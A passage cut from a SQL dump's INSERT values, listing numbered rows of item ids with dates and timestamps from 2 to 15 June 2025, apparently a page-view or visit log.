15:54:45'),(86774,5436,1,'2025-06-02','2025-06-02 16:47:41'),(86775,5436,1,'2025-06-02','2025-06-02 16:47:51'),(86776,5436,1,'2025-06-02','2025-06-02 16:48:00'),(86777,72,1,'2025-06-02','2025-06-02 16:48:36'),(86778,3781,1,'2025-06-02','2025-06-02 16:50:30'),(86779,4556,1,'2025-06-02','2025-06-02 22:36:07'),(86780,5436,1,'2025-06-02','2025-06-02 23:06:40'),(86781,5425,1,'2025-06-02','2025-06-02 23:07:38'),(86782,1709,1,'2025-06-03','2025-06-03 01:37:26'),(86783,80,1,'2025-06-03','2025-06-03 01:37:49'),(86784,2704,1,'2025-06-03','2025-06-03 03:00:21'),(86785,5101,1,'2025-06-03','2025-06-03 03:49:15'),(86786,5441,1,'2025-06-03','2025-06-03 04:29:42'),(86787,91,1,'2025-06-03','2025-06-03 05:44:28'),(86788,5363,1,'2025-06-03','2025-06-03 06:29:06'),(86789,3083,1,'2025-06-03','2025-06-03 08:17:33'),(86790,4424,1,'2025-06-03','2025-06-03 10:03:00'),(86791,3027,1,'2025-06-03','2025-06-03 11:27:47'),(86792,3664,1,'2025-06-03','2025-06-03 12:15:21'),(86793,3781,1,'2025-06-03','2025-06-03 12:33:40'),(86794,1598,1,'2025-06-03','2025-06-03 12:33:53'),(86795,1592,1,'2025-06-03','2025-06-03 12:36:48'),(86796,1590,1,'2025-06-03','2025-06-03 12:47:09'),(86797,2159,1,'2025-06-03','2025-06-03 12:48:29'),(86798,1544,1,'2025-06-03','2025-06-03 12:59:06'),(86799,72,1,'2025-06-03','2025-06-03 13:03:22'),(86800,2704,1,'2025-06-03','2025-06-03 13:23:45'),(86801,1610,1,'2025-06-03','2025-06-03 14:03:39'),(86802,482,1,'2025-06-03','2025-06-03 15:15:01'),(86803,2419,1,'2025-06-03','2025-06-03 15:20:23'),(86804,91,1,'2025-06-03','2025-06-03 16:46:49'),(86805,91,1,'2025-06-03','2025-06-03 16:48:07'),(86806,1713,1,'2025-06-03','2025-06-03 18:24:55'),(86807,1772,1,'2025-06-03','2025-06-03 18:28:31'),(86808,4747,1,'2025-06-03','2025-06-03 19:21:18'),(86809,4771,1,'2025-06-03','2025-06-03 19:33:04'),(86810,1610,1,'2025-06-03','2025-06-03 19:45:08'),(86811,2965,1,'2025-06-03','2025-06-03 20:05:01'),(86812,5146,1,'2025-06-03','2025-06-03 20:38:38'),(86813,1598,1,'2025-06-03','2025-06-03 21:01:11'),(86814,3127,1,'2025-06-03','2025-06-03 21:23:04'),(86815,2956,1,'2025-06-03','2025-06-03 21:55:53'),(86816,1703,1,'2025-06-04','2025-06-04 00:57:35'),(86817,1774,1,'2025-06-04','2025-06-04 01:18:31'),(86818,4827,1,'2025-06-04','2025-06-04 01:40:25'),(86819,4420,1,'2025-06-04','2025-06-04 02:58:10'),(86820,3109,1,'2025-06-04','2025-06-04 05:13:26'),(86821,4420,1,'2025-06-04','2025-06-04 06:58:18'),(86822,91,1,'2025-06-04','2025-06-04 07:36:14'),(86823,1749,1,'2025-06-04','2025-06-04 08:03:39'),(86824,472,1,'2025-06-04','2025-06-04 08:56:16'),(86825,3482,1,'2025-06-04','2025-06-04 11:13:33'),(86826,3534,1,'2025-06-04','2025-06-04 13:10:35'),(86827,4420,1,'2025-06-04','2025-06-04 13:42:30'),(86828,5140,1,'2025-06-04','2025-06-04 14:14:35'),(86829,5054,1,'2025-06-04','2025-06-04 16:00:13'),(86830,2993,1,'2025-06-04','2025-06-04 16:06:25'),(86831,91,1,'2025-06-04','2025-06-04 16:39:33'),(86832,1544,1,'2025-06-04','2025-06-04 18:14:39'),(86833,91,1,'2025-06-04','2025-06-04 18:35:59'),(86834,68,1,'2025-06-04','2025-06-04 22:30:25'),(86835,91,1,'2025-06-05','2025-06-05 01:29:38'),(86836,4420,1,'2025-06-05','2025-06-05 02:57:14'),(86837,4950,1,'2025-06-05','2025-06-05 04:16:42'),(86838,5356,1,'2025-06-05','2025-06-05 04:40:46'),(86839,4950,1,'2025-06-05','2025-06-05 05:31:28'),(86840,2775,1,'2025-06-05','2025-06-05 06:20:47'),(86841,91,1,'2025-06-05','2025-06-05 06:53:49'),(86842,91,1,'2025-06-05','2025-06-05 07:55:26'),(86843,2704,1,'2025-06-05','2025-06-05 08:16:48'),(86844,5400,1,'2025-06-05','2025-06-05 08:37:34'),(86845,3752,1,'2025-06-05','2025-06-05 10:30:58'),(86846,91,1,'2025-06-05','2025-06-05 11:07:05'),(86847,3749,1,'2025-06-05','2025-06-05 11:10:51'),(86848,3781,1,'2025-06-05','2025-06-05 12:55:02'),(86849,4950,1,'2025-06-05','2025-06-05 14:56:48'),(86850,5441,1,'2025-06-06','2025-06-06 01:24:15'),(86851,4420,1,'2025-06-06','2025-06-06 04:08:11'),(86852,4448,1,'2025-06-06','2025-06-06 04:20:24'),(86853,91,1,'2025-06-06','2025-06-06 08:38:39'),(86854,91,1,'2025-06-06','2025-06-06 14:15:14'),(86855,4874,1,'2025-06-06','2025-06-06 14:45:33'),(86856,4703,1,'2025-06-06','2025-06-06 15:34:14'),(86857,72,1,'2025-06-06','2025-06-06 15:39:01'),(86858,84,1,'2025-06-06','2025-06-06 15:40:04'),(86859,68,1,'2025-06-06','2025-06-06 15:40:30'),(86860,76,1,'2025-06-06','2025-06-06 15:41:06'),(86861,108,1,'2025-06-06','2025-06-06 15:42:25'),(86862,5428,1,'2025-06-06','2025-06-06 15:44:09'),(86863,5428,1,'2025-06-06','2025-06-06 15:56:59'),(86864,4301,1,'2025-06-06','2025-06-06 19:22:15'),(86865,5268,1,'2025-06-06','2025-06-06 21:05:06'),(86866,2813,1,'2025-06-06','2025-06-06 22:20:10'),(86867,2395,1,'2025-06-07','2025-06-07 04:07:24'),(86868,2297,1,'2025-06-07','2025-06-07 04:39:23'),(86869,5441,1,'2025-06-07','2025-06-07 05:11:01'),(86870,3290,1,'2025-06-07','2025-06-07 05:24:17'),(86871,4444,1,'2025-06-07','2025-06-07 05:40:19'),(86872,3297,1,'2025-06-07','2025-06-07 05:55:18'),(86873,4301,1,'2025-06-07','2025-06-07 06:12:12'),(86874,91,1,'2025-06-07','2025-06-07 09:48:43'),(86875,5428,1,'2025-06-07','2025-06-07 12:23:47'),(86876,2297,1,'2025-06-07','2025-06-07 13:30:34'),(86877,5433,1,'2025-06-07','2025-06-07 14:39:42'),(86878,2775,1,'2025-06-07','2025-06-07 15:18:05'),(86879,3263,1,'2025-06-07','2025-06-07 17:29:33'),(86880,1766,1,'2025-06-07','2025-06-07 18:59:01'),(86881,5005,1,'2025-06-07','2025-06-07 20:13:35'),(86882,3180,1,'2025-06-07','2025-06-07 20:50:46'),(86883,5415,1,'2025-06-07','2025-06-07 22:04:00'),(86884,5397,1,'2025-06-07','2025-06-07 23:55:40'),(86885,2964,1,'2025-06-08','2025-06-08 01:57:14'),(86886,80,1,'2025-06-08','2025-06-08 03:40:10'),(86887,5397,1,'2025-06-08','2025-06-08 04:03:59'),(86888,5400,1,'2025-06-08','2025-06-08 04:19:07'),(86889,4980,1,'2025-06-08','2025-06-08 04:48:46'),(86890,5334,1,'2025-06-08','2025-06-08 05:49:02'),(86891,5289,1,'2025-06-08','2025-06-08 09:48:55'),(86892,91,1,'2025-06-08','2025-06-08 10:01:41'),(86893,91,1,'2025-06-08','2025-06-08 15:11:42'),(86894,68,1,'2025-06-08','2025-06-08 17:35:18'),(86895,4950,1,'2025-06-08','2025-06-08 20:06:11'),(86896,87,1,'2025-06-08','2025-06-08 23:18:09'),(86897,84,1,'2025-06-08','2025-06-08 23:18:09'),(86898,91,1,'2025-06-09','2025-06-09 01:37:43'),(86899,68,1,'2025-06-09','2025-06-09 04:04:21'),(86900,4561,1,'2025-06-09','2025-06-09 08:04:47'),(86901,4893,1,'2025-06-09','2025-06-09 09:24:29'),(86902,91,1,'2025-06-09','2025-06-09 10:35:24'),(86903,1709,1,'2025-06-09','2025-06-09 11:12:16'),(86904,5436,1,'2025-06-09','2025-06-09 12:14:11'),(86905,4420,1,'2025-06-09','2025-06-09 12:17:16'),(86906,3083,1,'2025-06-09','2025-06-09 12:33:14'),(86907,5420,1,'2025-06-09','2025-06-09 17:29:52'),(86908,5420,1,'2025-06-09','2025-06-09 17:38:19'),(86909,89,1,'2025-06-09','2025-06-09 21:05:52'),(86910,335,1,'2025-06-10','2025-06-10 01:52:02'),(86911,5433,1,'2025-06-10','2025-06-10 05:26:17'),(86912,4416,1,'2025-06-10','2025-06-10 07:22:18'),(86913,110,1,'2025-06-10','2025-06-10 07:35:49'),(86914,3083,1,'2025-06-10','2025-06-10 09:23:11'),(86915,1870,1,'2025-06-10','2025-06-10 10:22:21'),(86916,91,1,'2025-06-10','2025-06-10 11:00:06'),(86917,4830,1,'2025-06-10','2025-06-10 11:52:45'),(86918,1745,1,'2025-06-10','2025-06-10 13:42:07'),(86919,3083,1,'2025-06-10','2025-06-10 14:10:04'),(86920,4556,1,'2025-06-10','2025-06-10 16:00:22'),(86921,5353,1,'2025-06-10','2025-06-10 18:07:05'),(86922,4950,1,'2025-06-10','2025-06-10 20:03:26'),(86923,80,1,'2025-06-10','2025-06-10 20:03:35'),(86924,4944,1,'2025-06-10','2025-06-10 21:45:14'),(86925,3267,1,'2025-06-11','2025-06-11 01:23:54'),(86926,5441,1,'2025-06-11','2025-06-11 04:52:35'),(86927,80,1,'2025-06-11','2025-06-11 10:40:02'),(86928,91,1,'2025-06-11','2025-06-11 11:17:43'),(86929,5400,1,'2025-06-11','2025-06-11 11:27:06'),(86930,5400,1,'2025-06-11','2025-06-11 11:28:55'),(86931,5400,1,'2025-06-11','2025-06-11 11:35:16'),(86932,5441,1,'2025-06-11','2025-06-11 15:24:05'),(86933,5259,1,'2025-06-11','2025-06-11 15:35:19'),(86934,5024,1,'2025-06-11','2025-06-11 15:51:46'),(86935,1604,1,'2025-06-11','2025-06-11 16:32:24'),(86936,5441,1,'2025-06-11','2025-06-11 17:24:59'),(86937,1745,1,'2025-06-11','2025-06-11 18:42:54'),(86938,5441,1,'2025-06-11','2025-06-11 19:13:51'),(86939,76,1,'2025-06-11','2025-06-11 19:32:42'),(86940,2420,1,'2025-06-11','2025-06-11 23:18:55'),(86941,5397,1,'2025-06-12','2025-06-12 04:05:51'),(86942,108,1,'2025-06-12','2025-06-12 07:11:57'),(86943,5024,1,'2025-06-12','2025-06-12 07:16:04'),(86944,1728,1,'2025-06-12','2025-06-12 10:06:58'),(86945,1724,1,'2025-06-12','2025-06-12 10:06:58'),(86946,5356,1,'2025-06-12','2025-06-12 10:56:23'),(86947,5356,1,'2025-06-12','2025-06-12 10:56:25'),(86948,1724,1,'2025-06-12','2025-06-12 11:26:18'),(86949,1728,1,'2025-06-12','2025-06-12 11:26:18'),(86950,91,1,'2025-06-12','2025-06-12 11:57:05'),(86951,2813,1,'2025-06-12','2025-06-12 12:27:00'),(86952,3083,1,'2025-06-12','2025-06-12 13:27:07'),(86953,1728,1,'2025-06-12','2025-06-12 15:23:47'),(86954,1724,1,'2025-06-12','2025-06-12 15:23:47'),(86955,4870,1,'2025-06-12','2025-06-12 15:40:04'),(86956,468,1,'2025-06-12','2025-06-12 17:53:25'),(86957,4663,1,'2025-06-12','2025-06-12 18:25:14'),(86958,91,1,'2025-06-12','2025-06-12 18:43:08'),(86959,3226,1,'2025-06-12','2025-06-12 18:43:41'),(86960,5024,1,'2025-06-12','2025-06-12 18:47:39'),(86961,2293,1,'2025-06-12','2025-06-12 18:57:13'),(86962,4950,1,'2025-06-12','2025-06-12 23:33:53'),(86963,4980,1,'2025-06-13','2025-06-13 01:09:20'),(86964,4983,1,'2025-06-13','2025-06-13 02:24:11'),(86965,4862,1,'2025-06-13','2025-06-13 02:57:17'),(86966,1612,1,'2025-06-13','2025-06-13 08:25:16'),(86967,4950,1,'2025-06-13','2025-06-13 10:05:12'),(86968,487,1,'2025-06-13','2025-06-13 11:30:23'),(86969,91,1,'2025-06-13','2025-06-13 12:17:48'),(86970,4950,1,'2025-06-13','2025-06-13 12:26:12'),(86971,68,1,'2025-06-13','2025-06-13 12:29:51'),(86972,4930,1,'2025-06-13','2025-06-13 12:30:21'),(86973,4950,1,'2025-06-13','2025-06-13 12:30:34'),(86974,4930,1,'2025-06-13','2025-06-13 12:35:36'),(86975,5406,1,'2025-06-13','2025-06-13 12:55:08'),(86976,470,1,'2025-06-13','2025-06-13 14:12:34'),(86977,5428,1,'2025-06-13','2025-06-13 14:34:40'),(86978,2704,1,'2025-06-13','2025-06-13 15:11:29'),(86979,1872,1,'2025-06-13','2025-06-13 16:25:44'),(86980,1877,1,'2025-06-13','2025-06-13 16:25:47'),(86981,1870,1,'2025-06-13','2025-06-13 16:25:49'),(86982,2503,1,'2025-06-13','2025-06-13 16:26:22'),(86983,80,1,'2025-06-13','2025-06-13 16:26:27'),(86984,335,1,'2025-06-13','2025-06-13 16:26:29'),(86985,108,1,'2025-06-13','2025-06-13 16:26:30'),(86986,91,1,'2025-06-13','2025-06-13 16:26:36'),(86987,72,1,'2025-06-13','2025-06-13 16:26:36'),(86988,87,1,'2025-06-13','2025-06-13 16:26:40'),(86989,76,1,'2025-06-13','2025-06-13 16:26:42'),(86990,68,1,'2025-06-13','2025-06-13 16:26:42'),(86991,84,1,'2025-06-13','2025-06-13 16:26:42'),(86992,89,1,'2025-06-13','2025-06-13 16:26:42'),(86993,4930,1,'2025-06-13','2025-06-13 16:26:42'),(86994,2904,1,'2025-06-13','2025-06-13 16:26:44'),(86995,74,1,'2025-06-13','2025-06-13 16:26:44'),(86996,5428,1,'2025-06-13','2025-06-13 16:27:13'),(86997,5433,1,'2025-06-13','2025-06-13 16:27:19'),(86998,5436,1,'2025-06-13','2025-06-13 16:27:22'),(86999,5441,1,'2025-06-13','2025-06-13 16:27:22'),(87000,468,1,'2025-06-13','2025-06-13 16:27:44'),(87001,474,1,'2025-06-13','2025-06-13 16:27:44'),(87002,470,1,'2025-06-13','2025-06-13 16:27:54'),(87003,473,1,'2025-06-13','2025-06-13 16:27:56'),(87004,487,1,'2025-06-13','2025-06-13 16:27:57'),(87005,2420,1,'2025-06-13','2025-06-13 16:28:03'),(87006,2411,1,'2025-06-13','2025-06-13 16:28:33'),(87007,2419,1,'2025-06-13','2025-06-13 16:28:33'),(87008,2410,1,'2025-06-13','2025-06-13 16:28:34'),(87009,2395,1,'2025-06-13','2025-06-13 16:28:34'),(87010,3664,1,'2025-06-13','2025-06-13 16:29:03'),(87011,5425,1,'2025-06-13','2025-06-13 16:29:06'),(87012,486,1,'2025-06-13','2025-06-13 16:29:11'),(87013,471,1,'2025-06-13','2025-06-13 16:29:11'),(87014,5397,1,'2025-06-13','2025-06-13 16:29:11'),(87015,488,1,'2025-06-13','2025-06-13 16:29:16'),(87016,469,1,'2025-06-13','2025-06-13 16:29:25'),(87017,467,1,'2025-06-13','2025-06-13 16:29:40'),(87018,5406,1,'2025-06-13','2025-06-13 16:29:46'),(87019,476,1,'2025-06-13','2025-06-13 16:29:47'),(87020,5409,1,'2025-06-13','2025-06-13 16:30:10'),(87021,5412,1,'2025-06-13','2025-06-13 16:30:10'),(87022,485,1,'2025-06-13','2025-06-13 16:30:42'),(87023,3691,1,'2025-06-13','2025-06-13 16:30:43'),(87024,5400,1,'2025-06-13','2025-06-13 16:30:43'),(87025,5359,1,'2025-06-13','2025-06-13 16:30:43'),(87026,5307,1,'2025-06-13','2025-06-13 16:31:30'),(87027,5314,1,'2025-06-13','2025-06-13 16:31:36'),(87028,4759,1,'2025-06-13','2025-06-13 16:31:39'),(87029,2809,1,'2025-06-13','2025-06-13 16:31:42'),(87030,4983,1,'2025-06-13','2025-06-13 16:31:42'),(87031,2804,1,'2025-06-13','2025-06-13 16:31:43'),(87032,4976,1,'2025-06-13','2025-06-13 16:31:46'),(87033,2813,1,'2025-06-13','2025-06-13 16:31:48'),(87034,5317,1,'2025-06-13','2025-06-13 16:31:50'),(87035,477,1,'2025-06-13','2025-06-13 16:31:50'),(87036,5256,1,'2025-06-13','2025-06-13 16:32:37'),(87037,3297,1,'2025-06-13','2025-06-13 16:32:37'),(87038,4988,1,'2025-06-13','2025-06-13 16:32:39'),(87039,4750,1,'2025-06-13','2025-06-13 16:32:39'),(87040,3489,1,'2025-06-13','2025-06-13 16:32:39'),(87041,2956,1,'2025-06-13','2025-06-13 16:32:41'),(87042,5131,1,'2025-06-13','2025-06-13 16:33:00'),(87043,5134,1,'2025-06-13','2025-06-13 16:33:08'),(87044,5137,1,'2025-06-13','2025-06-13 16:33:09'),(87045,5304,1,'2025-06-13','2025-06-13 16:33:47'),(87046,5323,1,'2025-06-13','2025-06-13 16:33:49'),(87047,5320,1,'2025-06-13','2025-06-13 16:33:53'),(87048,4762,1,'2025-06-13','2025-06-13 16:33:53'),(87049,5101,1,'2025-06-13','2025-06-13 16:34:19'),(87050,5310,1,'2025-06-13','2025-06-13 16:34:35'),(87051,4694,1,'2025-06-13','2025-06-13 16:34:58'),(87052,4660,1,'2025-06-13','2025-06-13 16:34:58'),(87053,5353,1,'2025-06-13','2025-06-13 16:34:58'),(87054,4768,1,'2025-06-13','2025-06-13 16:35:04'),(87055,4765,1,'2025-06-13','2025-06-13 16:35:05'),(87056,4771,1,'2025-06-13','2025-06-13 16:35:15'),(87057,4741,1,'2025-06-13','2025-06-13 16:35:24'),(87058,3482,1,'2025-06-13','2025-06-13 16:35:25'),(87059,3714,1,'2025-06-13','2025-06-13 16:35:36'),(87060,5125,1,'2025-06-13','2025-06-13 16:35:44'),(87061,4691,1,'2025-06-13','2025-06-13 16:36:02'),(87062,5122,1,'2025-06-13','2025-06-13 16:36:02'),(87063,4712,1,'2025-06-13','2025-06-13 16:36:02'),(87064,4753,1,'2025-06-13','2025-06-13 16:36:03'),(87065,3771,1,'2025-06-13','2025-06-13 16:36:09'),(87066,3774,1,'2025-06-13','2025-06-13 16:36:11'),(87067,5128,1,'2025-06-13','2025-06-13 16:36:16'),(87068,4747,1,'2025-06-13','2025-06-13 16:36:20'),(87069,3127,1,'2025-06-13','2025-06-13 16:36:23'),(87070,3486,1,'2025-06-13','2025-06-13 16:36:24'),(87071,3290,1,'2025-06-13','2025-06-13 16:36:38'),(87072,4663,1,'2025-06-13','2025-06-13 16:36:51'),(87073,4657,1,'2025-06-13','2025-06-13 16:36:58'),(87074,3045,1,'2025-06-13','2025-06-13 16:37:08'),(87075,3063,1,'2025-06-13','2025-06-13 16:37:11'),(87076,3060,1,'2025-06-13','2025-06-13 16:37:16'),(87077,3066,1,'2025-06-13','2025-06-13 16:37:23'),(87078,3069,1,'2025-06-13','2025-06-13 16:37:26'),(87079,3072,1,'2025-06-13','2025-06-13 16:37:28'),(87080,4400,1,'2025-06-13','2025-06-13 16:37:28'),(87081,3090,1,'2025-06-13','2025-06-13 16:37:28'),(87082,3117,1,'2025-06-13','2025-06-13 16:37:32'),(87083,3023,1,'2025-06-13','2025-06-13 16:37:39'),(87084,5292,1,'2025-06-13','2025-06-13 16:37:58'),(87085,5280,1,'2025-06-13','2025-06-13 16:38:06'),(87086,5295,1,'2025-06-13','2025-06-13 16:38:17'),(87087,5289,1,'2025-06-13','2025-06-13 16:38:17'),(87088,5298,1,'2025-06-13','2025-06-13 16:38:19'),(87089,5301,1,'2025-06-13','2025-06-13 16:38:24'),(87090,478,1,'2025-06-13','2025-06-13 16:38:36'),(87091,4582,1,'2025-06-13','2025-06-13 16:38:43'),(87092,4524,1,'2025-06-13','2025-06-13 16:38:49'),(87093,3498,1,'2025-06-13','2025-06-13 16:38:50'),(87094,4529,1,'2025-06-13','2025-06-13 16:38:55'),(87095,3764,1,'2025-06-13','2025-06-13 16:38:56'),(87096,3781,1,'2025-06-13','2025-06-13 16:38:58'),(87097,4776,1,'2025-06-13','2025-06-13 16:38:58'),(87098,3742,1,'2025-06-13','2025-06-13 16:39:03'),(87099,5268,1,'2025-06-13','2025-06-13 16:39:16'),(87100,5271,1,'2025-06-13','2025-06-13 16:39:18'),(87101,5420,1,'2025-06-13','2025-06-13 19:34:27'),(87102,5415,1,'2025-06-14','2025-06-14 07:02:53'),(87103,2993,1,'2025-06-14','2025-06-14 11:24:45'),(87104,3083,1,'2025-06-14','2025-06-14 11:35:52'),(87105,1751,1,'2025-06-14','2025-06-14 11:54:27'),(87106,91,1,'2025-06-14','2025-06-14 12:30:59'),(87107,5406,1,'2025-06-14','2025-06-14 15:39:04'),(87108,3781,1,'2025-06-14','2025-06-14 17:47:17'),(87109,3055,1,'2025-06-14','2025-06-14 17:53:18'),(87110,80,1,'2025-06-15','2025-06-15 02:08:44'),(87111,1877,1,'2025-06-15','2025-06-15 02:10:30'),(87112,68,1,'2025-06-15','2025-06-15 02:23:32'),(87113,84,1,'2025-06-15','2025-06-15 02:29:40'),(87114,1872,1,'2025-06-15','2025-06-15 02:40:14'),(87115,5425,1,'2025-06-15','2025-06-15 02:47:06'),(87116,87,1,'2025-06-15','2025-06-15 02:55:11'),(87117,72,1,'2025-06-15','2025-06-15 02:55:51'),(87118,2503,1,'2025-06-15','2025-06-15 03:06:21'),(87119,91,1,'2025-06-15','2025-06-15 03:10:24'),(87120,5436,1,'2025-06-15','2025-06-15 03:11:12'),(87121,108,1,'2025-06-15','2025-06-15 03:18:52'),(87122,2503,1,'2025-06-15','2025-06-15 03:24:07'),(87123,4930,1,'2025-06-15','2025-06-15 03:24:09'),(87124,5433,1,'2025-06-15','2025-06-15 03:26:09'),(87125,76,1,'2025-06-15','2025-06-15 03:58:29'),(87126,89,1,'2025-06-15','2025-06-15 03:59:12'),(87127,74,1,'2025-06-15','2025-06-15 04:18:20'),(87128,476,1,'2025-06-15','2025-06-15 04:43:02'),(87129,5005,1,'2025-06-15','2025-06-15 04:45:26'),(87130,479,1,'2025-06-15','2025-06-15 04:47:59'),(87131,471,1,'2025-06-15','2025-06-15 04:48:39'),(87132,5343,1,'2025-06-15','2025-06-15 04:49:46'),(87133,5119,1,'2025-06-15','2025-06-15 04:53:34'),(87134,5363,1,'2025-06-15','2025-06-15 04:53:53'),(87135,5140,1,'2025-06-15','2025-06-15 04:55:09'),(87136,483,1,'2025-06-15','2025-06-15 04:56:36'),(87137,4963,1,'2025-06-15','2025-06-15 04:57:11'),(87138,72,1,'2025-06-15','2025-06-15 05:00:00'),(87139,5071,1,'2025-06-15','2025-06-15 05:00:22'),(87140,5113,1,'2025-06-15','2025-06-15 05:07:22'),(87141,4950,1,'2025-06-15','2025-06-15 05:08:10'),(87142,5415,1,'2025-06-15','2025-06-15 05:09:37'),(87143,5058,1,'2025-06-15','2025-06-15 05:10:22'),(87144,5346,1,'2025-06-15','2025-06-15 05:12:05'),(87145,5116,1,'2025-06-15','2025-06-15 05:12:22'),(87146,477,1,'2025-06-15','2025-06-15 05:14:05'),(87147,481,1,'2025-06-15','2025-06-15 05:15:53'),(87148,485,1,'2025-06-15','2025-06-15 05:16:56'),(87149,4966,1,'2025-06-15','2025-06-15 05:20:54'),(87150,4941,1,'2025-06-15','2025-06-15 05:24:22'),(87151,72,1,'2025-06-15','2025-06-15 05:24:34'),(87152,335,1,'2025-06-15','2025-06-15 05:28:02'),(87153,5264,1,'2025-06-15','2025-06-15 05:28:16'),(87154,5080,1,'2025-06-15','2025-06-15 05:32:15'),(87155,2411,1,'2025-06-15','2025-06-15 05:32:54'),(87156,5420,1,'2025-06-15','2025-06-15 05:34:32'),(87157,5259,1,'2025-06-15','2025-06-15 05:35:34'),(87158,5146,1,'2025-06-15','2025-06-15 05:35:45'),(87159,472,1,'2025-06-15','2025-06-15 05:38:41'),(87160,486,1,'2025-06-15','2025-06-15 05:40:08'),(87161,5378,1,'2025-06-15','2025-06-15 05:42:50'),(87162,3664,1,'2025-06-15','2025-06-15 05:44:53'),(87163,4960,1,'2025-06-15','2025-06-15 05:47:55'),(87164,470,1,'2025-06-15','2025-06-15 05:52:41'),(87165,5067,1,'2025-06-15','2025-06-15 06:02:07'),(87166,2395,1,'2025-06-15','2025-06-15 06:03:32'),(87167,89,1,'2025-06-15','2025-06-15 06:04:56'),(87168,5153,1,'2025-06-15','2025-06-15 06:05:32'),(87169,474,1,'2025-06-15','2025-06-15 06:06:32'),(87170,3691,1,'2025-06-15','2025-06-15 06:12:28'),(87171,488,1,'2025-06-15','2025-06-15 06:13:10'),(87172,5374,1,'2025-06-15','2025-06-15 06:15:33'),(87173,72,1,'2025-06-15','2025-06-15 06:16:58'),(87174,5441,1,'2025-06-15','2025-06-15 06:19:03'),(87175,2904,1,'2025-06-15','2025-06-15 06:21:15'),(87176,5326,1,'2025-06-15','2025-06-15 06:21:25'),(87177,72,1,'2025-06-15','2025-06-15 06:25:28'),(87178,4944,1,'2025-06-15','2025-06-15 06:27:29'),(87179,473,1,'2025-06-15','2025-06-15 06:33:31'),(87180,2420,1,'2025-06-15','2025-06-15 06:34:19'),(87181,4911,1,'2025-06-15','2025-06-15 06:35:20'),(87182,5062,1,'2025-06-15','2025-06-15 06:39:48'),(87183,5371,1,'2025-06-15','2025-06-15 06:42:10'),(87184,5248,1,'2025-06-15','2025-06-15 06:46:02'),(87185,1596,1,'2025-06-15','2025-06-15 06:48:22'),(87186,5157,1,'2025-06-15','2025-06-15 06:50:12'),(87187,468,1,'2025-06-15','2025-06-15 06:51:23'),(87188,5428,1,'2025-06-15','2025-06-15 06:56:05'),(87189,1588,1,'2025-06-15','2025-06-15 06:56:13'),(87190,5397,1,'2025-06-15','2025-06-15 06:57:37'),(87191,484,1,'2025-06-15','2025-06-15 07:05:09'),(87192,5406,1,'2025-06-15','2025-06-15 07:06:52'),(87193,5076,1,'2025-06-15','2025-06-15 07:07:38'),(87194,3694,1,'2025-06-15','2025-06-15 07:09:07'),(87195,72,1,'2025-06-15','2025-06-15 07:13:59'),(87196,482,1,'2025-06-15','2025-06-15 07:14:52'),(87197,5330,1,'2025-06-15','2025-06-15 07:15:21'),(87198,5353,1,'2025-06-15','2025-06-15 07:17:42'),(87199,469,1,'2025-06-15','2025-06-15 07:21:47'),(87200,5101,1,'2025-06-15','2025-06-15 07:26:17'),(87201,4612,1,'2025-06-15','2025-06-15 07:26:59'),(87202,487,1,'2025-06-15','2025-06-15 07:34:17'),(87203,1766,1,'2025-06-15','2025-06-15 07:40:34'),(87204,1592,1,'2025-06-15','2025-06-15 07:41:57'),(87205,4556,1,'2025-06-15','2025-06-15 07:43:24'),(87206,2159,1,'2025-06-15','2025-06-15 07:44:01'),(87207,4635,1,'2025-06-15','2025-06-15 07:44:01'),(87208,1544,1,'2025-06-15','2025-06-15 07:44:22'),(87209,5109,1,'2025-06-15','2025-06-15 07:47:49'),(87210,2419,1,'2025-06-15','2025-06-15 07:48:38'),(87211,480,1,'2025-06-15','2025-06-15 07:50:03'),(87212,2503,1,'2025-06-15','2025-06-15 07:53:52'),(87213,5441,1,'2025-06-15','2025-06-15 07:54:15'),(87214,1584,1,'2025-06-15','2025-06-15 07:56:05'),(87215,2410,1,'2025-06-15','2025-06-15 07:57:10'),(87216,4608,1,'2025-06-15','2025-06-15 07:58:50'),(87217,5337,1,'2025-06-15','2025-06-15 07:59:26'),(87218,4508,1,'2025-06-15','2025-06-15 08:00:38'),(87219,89,1,'2025-06-15','2025-06-15 08:03:08'),(87220,5310,1,'2025-06-15','2025-06-15 08:15:21'),(87221,1870,1,'2025-06-15','2025-06-15 08:15:26'),(87222,4377,1,'2025-06-15','2025-06-15 08:16:23'),(87223,1778,1,'2025-06-15','2025-06-15 08:18:15'),(87224,4569,1,'2025-06-15','2025-06-15 08:20:44'),(87225,4432,1,'2025-06-15','2025-06-15 08:23:29'),(87226,4391,1,'2025-06-15','2025-06-15 08:24:07'),(87227,5314,1,'2025-06-15','2025-06-15 08:24:10'),(87228,2558,1,'2025-06-15','2025-06-15 08:24:32'),(87229,4837,1,'2025-06-15','2025-06-15 08:25:03'),(87230,4840,1,'2025-06-15','2025-06-15 08:25:42'),(87231,5412,1,'2025-06-15','2025-06-15 08:32:43'),(87232,4627,1,'2025-06-15','2025-06-15 08:33:47'),(87233,1774,1,'2025-06-15','2025-06-15 08:35:25'),(87234,5409,1,'2025-06-15','2025-06-15 08:36:11'),(87235,5334,1,'2025-06-15','2025-06-15 08:36:32'),(87236,4510,1,'2025-06-15','2025-06-15 08:37:11'),(87237,5033,1,'2025-06-15','2025-06-15 08:39:02'),(87238,1718,1,'2025-06-15','2025-06-15 08:39:10'),(87239,4492,1,'2025-06-15','2025-06-15 08:39:23'),(87240,4835,1,'2025-06-15','2025-06-15 08:40:05'),(87241,3271,1,'2025-06-15','2025-06-15 08:44:04'),(87242,1598,1,'2025-06-15','2025-06-15 08:47:52'),(87243,4485,1,'2025-06-15','2025-06-15 08:48:31'),(87244,1586,1,'2025-06-15','2025-06-15 08:52:13'),(87245,2989,1,'2025-06-15','2025-06-15 08:56:10'),(87246,4498,1,'2025-06-15','2025-06-15 08:57:31'),(87247,1604,1,'2025-06-15','2025-06-15 08:59:17'),(87248,76,1,'2025-06-15','2025-06-15 09:00:46'),(87249,1780,1,'2025-06-15','2025-06-15 09:01:11'),(87250,478,1,'2025-06-15','2025-06-15 09:01:51'),(87251,4387,1,'2025-06-15','2025-06-15 09:02:07'),(87252,4373,1,'2025-06-15','2025-06-15 09:02:14'),(87253,4448,1,'2025-06-15','2025-06-15 09:03:03'),(87254,5323,1,'2025-06-15','2025-06-15 09:04:56'),(87255,4561,1,'2025-06-15','2025-06-15 09:05:28'),(87256,2751,1,'2025-06-15','2025-06-15 09:05:40'),(87257,5356,1,'2025-06-15','2025-06-15 09:06:08'),(87258,4759,1,'2025-06-15','2025-06-15 09:07:43'),(87259,4494,1,'2025-06-15','2025-06-15 09:08:31'),(87260,1594,1,'2025-06-15','2025-06-15 